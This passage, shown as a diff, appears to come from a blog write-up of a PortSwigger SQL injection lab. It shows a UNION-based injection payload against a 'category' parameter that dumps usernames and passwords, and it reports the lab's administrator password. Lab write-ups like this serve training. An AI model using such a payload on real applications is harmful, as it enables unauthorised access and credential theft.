jawadnassar/jawad.ca/_posts/2023-06-17-writeup-sqli-portswigger-unionattack-data-other-tables.md

 Knowing that we have a table named `users` with 2 columns, namely, `username` and `password`, let's perform a join on this table to list all the users: `category=Gifts' UNION SELECT username, password FROM users--`

 Et voilà!
-The user 'administrator' is returned with the password 'u35dnobwat09aipkb3xn'.
+The user `administrator` is returned with the password `u35dnobwat09aipkb3xn`.

 <img src="/images/june2023/3.png" style="max-width:90%;">